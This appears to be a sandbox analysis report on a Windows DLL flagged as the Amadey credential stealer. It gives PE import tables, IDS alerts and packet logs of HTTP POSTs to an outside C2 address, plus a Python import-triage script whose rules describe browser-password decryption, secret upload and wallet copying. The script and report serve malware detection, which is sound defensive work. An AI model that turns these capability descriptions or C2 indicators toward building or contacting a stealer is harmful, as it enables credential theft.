IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xfe258          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xe7000          0x2f0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe5478 | 0xe5600 | 6459ce3e8dab0c0f9a8d9b32582fa649 | False | 0.48708595878746597 | data | 6.620598152229375 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xe7000 | 0x1a462 | 0x1a600 | f37d9589b61c9372dce1e703c33ec81b | False | 0.4942702162322275 | data | 5.994296048025553 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x102000 | 0x8f8c | 0x2e00 | cab1fb9c909133804e55f94108a6d406 | False | 0.16525135869565216 | data | 2.7513977064678916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x10b000 | 0xf8 | 0x200 | a9a28dcf81ea8b2bbb0c1083475755c2 | False | 0.3359375 | data | 2.5312981004807127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10c000 | 0x6690 | 0x6800 | 6e4dc0f9f380031dd089a15a86a70e3a | False | 0.7274639423076923 | data | 6.65509143676354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x10b060 | 0x91 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.8689655172413793
DLL | Import
CRYPT32.dll | CryptUnprotectData
KERNEL32.dll | GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, ReadConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, GetStdHandle, GetTimeZoneInformation, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RaiseException, InterlockedFlushSList, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, WriteConsoleW
ADVAPI32.dll | GetSidSubAuthority, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegQueryValueExA, GetSidSubAuthorityCount, RegOpenKeyExA, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
SHELL32.dll | SHFileOperationA, SHGetFolderPathA
WININET.dll | HttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW, InternetWriteFile
bcrypt.dll | BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt
Name | Ordinal | Address
Main | 1 | 0x100b2050
Save | 2 | 0x100045c0
Language of compilation system | Country where language is spoken | Map
English | United States |
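The import table above already says a lot about what the module can do: CryptUnprotectData together with the four bcrypt.dll functions is the shape of Chromium "v10" password decryption (DPAPI-unwrap the Local State key, AES-GCM via CNG), WinINet's HttpSendRequest/InternetWriteFile pair is an HTTP upload path, and CreatePipe/PeekNamedPipe/CreateProcessA is the shape of spawning a helper such as netsh and reading its output. The Python below is an added example, not part of the report or of any analysis tool: it encodes that reasoning as rules and runs them over the imports transcribed from the table (only the names the rules reference are transcribed; the rule labels and rationale are the example's own). The caveat a practitioner needs: static import triage is a heuristic. LoadLibraryA/GetProcAddress are also imported, so further APIs may be resolved at runtime, and an import proves only that a capability is reachable, not that it is exercised.

```python
# Import table transcribed from the report above.  Only the functions the rules below
# reference are listed (KERNEL32 alone imports far more); this is constructed input for
# the example, but every API name is one the page lists for this DLL.
IMPORTS = {
    "CRYPT32.dll": {"CryptUnprotectData"},
    "bcrypt.dll": {"BCryptOpenAlgorithmProvider", "BCryptSetProperty",
                   "BCryptGenerateSymmetricKey", "BCryptDecrypt"},
    "WININET.dll": {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                    "HttpAddRequestHeadersA", "HttpSendRequestA", "HttpSendRequestExW",
                    "InternetWriteFile", "HttpEndRequestA", "InternetReadFile"},
    "KERNEL32.dll": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
                     "OpenProcess", "Wow64DisableWow64FsRedirection",
                     "Wow64RevertWow64FsRedirection", "CreatePipe", "PeekNamedPipe",
                     "CreateProcessA", "FindFirstFileA", "FindNextFileA", "CopyFileA",
                     "LoadLibraryA", "GetProcAddress", "IsDebuggerPresent", "Sleep"},
    "ADVAPI32.dll": {"RegOpenKeyExA", "RegEnumKeyExW", "RegEnumValueW",
                     "RegQueryValueExA", "GetUserNameA"},
    "SHELL32.dll": {"SHGetFolderPathA", "SHFileOperationA"},
}

# A rule fires when every `all_of` API is imported and, if `any_of` is present, at
# least one of those.  Labels and rationale are this example's, not the report's.
RULES = [
    {"name": "chromium-v10-credential-decryption",
     "all_of": {"CryptUnprotectData", "BCryptOpenAlgorithmProvider", "BCryptSetProperty",
                "BCryptGenerateSymmetricKey", "BCryptDecrypt"},
     "why": "DPAPI-unwrap the browser's Local State key, then AES-GCM-decrypt 'v10' blobs via CNG"},
    {"name": "dpapi-blob-decryption",
     "all_of": {"CryptUnprotectData"},
     "why": "reads secrets protected with the user's DPAPI master key (browsers, FTP/IM clients)"},
    {"name": "http-upload-wininet",
     "all_of": {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA"},
     "any_of": {"HttpSendRequestA", "HttpSendRequestExW", "InternetWriteFile"},
     "why": "HTTP POST of collected data through WinINet"},
    {"name": "process-enumeration",
     "all_of": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
     "why": "walks the process list, typically to find or terminate browser processes"},
    {"name": "child-process-output-capture",
     "all_of": {"CreatePipe", "PeekNamedPipe", "CreateProcessA"},
     "why": "runs a helper and reads its stdout, the shape of a 'netsh wlan show profile' harvest"},
    {"name": "wow64-redirection-bypass",
     "all_of": {"Wow64DisableWow64FsRedirection"},
     "why": "32-bit module reaching the native System32 directory"},
    {"name": "filesystem-crawl-and-copy",
     "all_of": {"FindFirstFileA", "FindNextFileA", "CopyFileA"},
     "why": "enumerates directories and copies files out (profile databases, wallets)"},
    {"name": "registry-enumeration",
     "all_of": {"RegOpenKeyExA"},
     "any_of": {"RegEnumKeyExW", "RegEnumValueW", "RegQueryValueExA"},
     "why": "enumerates registry keys, where several FTP and IM clients keep accounts"},
    {"name": "dynamic-api-resolution",
     "all_of": {"LoadLibraryA", "GetProcAddress"},
     "why": "caveat: further APIs can be resolved at runtime and will not appear in this table"},
    {"name": "winsock-raw-exfil",
     "all_of": {"WSAStartup", "connect", "send"},
     "why": "control rule: the sample uses WinINet, so this must not fire"},
]


def flatten_imports(imports):
    """Set of every imported function name, regardless of DLL."""
    return set().union(*imports.values())


def rule_matches(rule, names):
    """True when all `all_of` names are present and (if given) at least one `any_of` name."""
    if not rule["all_of"] <= names:
        return False
    any_of = rule.get("any_of")
    return any_of is None or bool(any_of & names)


def triage(imports):
    """Names of the rules that fire, in RULES order."""
    names = flatten_imports(imports)
    return [rule["name"] for rule in RULES if rule_matches(rule, names)]


def explain(imports):
    """One line per firing rule: name, rationale, and the imports that satisfied it."""
    names = flatten_imports(imports)
    lines = []
    for rule in RULES:
        if rule_matches(rule, names):
            hits = sorted((rule["all_of"] | rule.get("any_of", set())) & names)
            lines.append(f"{rule['name']}: {rule['why']} [{', '.join(hits)}]")
    return lines


if __name__ == "__main__":
    for line in explain(IMPORTS):
        print(line)
```

The rule shape (all_of plus optional any_of) is deliberately the minimum that distinguishes a real capability from a single coincidental API: CryptUnprotectData alone is in plenty of benign software, but it rarely travels with BCryptGenerateSymmetricKey and BCryptDecrypt outside of browser-credential code.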
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-21T01:53:33.351067+0100 | 2855239 | ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) | 1 | 192.168.2.8 | 49706 | 185.196.8.37 | 80 | TCP
2025-02-21T01:53:33.351091+0100 | 2855239 | ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) | 1 | 192.168.2.8 | 49707 | 185.196.8.37 | 80 | TCP
2025-02-21T01:53:40.177381+0100 | 2855239 | ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) | 1 | 192.168.2.8 | 49708 | 185.196.8.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 21, 2025 01:53:32.619255066 CET | 49706 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:32.621835947 CET | 49707 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:32.624284029 CET | 80 | 49706 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:32.624582052 CET | 49706 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:32.624582052 CET | 49706 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:32.626841068 CET | 80 | 49707 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:32.626904011 CET | 49707 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:32.627053022 CET | 49707 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:32.629594088 CET | 80 | 49706 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:32.631989956 CET | 80 | 49707 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:33.350965977 CET | 80 | 49706 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:33.350981951 CET | 80 | 49707 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:33.351067066 CET | 49706 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:33.351090908 CET | 49707 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:38.355109930 CET | 80 | 49706 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:38.355135918 CET | 80 | 49707 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:38.355170965 CET | 49706 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:38.355186939 CET | 49707 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:39.516139984 CET | 49708 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:39.521348953 CET | 80 | 49708 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:39.521409035 CET | 49708 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:39.521580935 CET | 49708 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:39.526571035 CET | 80 | 49708 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:40.176331997 CET | 80 | 49708 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:40.177381039 CET | 49708 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:45.182847023 CET | 80 | 49708 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:45.182913065 CET | 49708 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.573427916 CET | 49706 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.573730946 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.578433037 CET | 80 | 49706 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.578804016 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.578887939 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582411051 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582467079 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582521915 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582561016 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582588911 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582626104 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582653046 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582685947 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582714081 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582747936 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582777977 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582812071 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582839966 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582875967 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582905054 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582938910 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582966089 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.582999945 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583030939 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583064079 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583091974 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583134890 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583168030 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583203077 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583233118 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583270073 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583309889 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583339930 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583410978 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583441973 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583488941 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583518982 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583551884 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583584070 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583623886 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583652020 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583688021 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583719015 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583755016 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583781958 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583817959 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583846092 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583878994 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583909988 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583944082 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.583971024 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584002972 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584031105 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584068060 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584094048 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584129095 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584156036 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584193945 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584223986 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584258080 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584283113 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584316969 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584343910 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584382057 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584408998 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584443092 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584470034 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584502935 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584533930 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584568024 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584595919 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584630013 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584657907 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584696054 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584722042 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584753990 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584779978 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584813118 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584845066 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584878922 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584906101 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584939003 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.584965944 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585005045 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585031986 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585067034 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585093975 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585127115 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585158110 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585196018 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585222006 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585253954 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585283041 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585318089 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585345984 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585377932 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585407019 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585436106 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585465908 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585504055 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585530996 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585565090 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585592985 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585628033 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585654020 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585686922 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585714102 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585747957 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585776091 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585808039 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585834026 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585867882 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585896969 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585931063 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585958004 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.585990906 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586019039 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586055040 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586081028 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586113930 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586139917 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586174011 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586204052 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586236954 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586265087 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586298943 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586327076 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586363077 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586390972 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586424112 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586448908 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586487055 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586510897 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586544991 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586571932 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586604118 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586648941 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586683989 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586709976 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586745024 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586776018 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586802959 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586836100 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.586872101 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587414980 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587447882 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587470055 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587472916 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587506056 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
Feb 21, 2025 01:53:53.587511063 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587527990 CET | 80 | 49712 | 185.196.8.37 | 192.168.2.8
Feb 21, 2025 01:53:53.587543964 CET | 49712 | 80 | 192.168.2.8 | 185.196.8.37
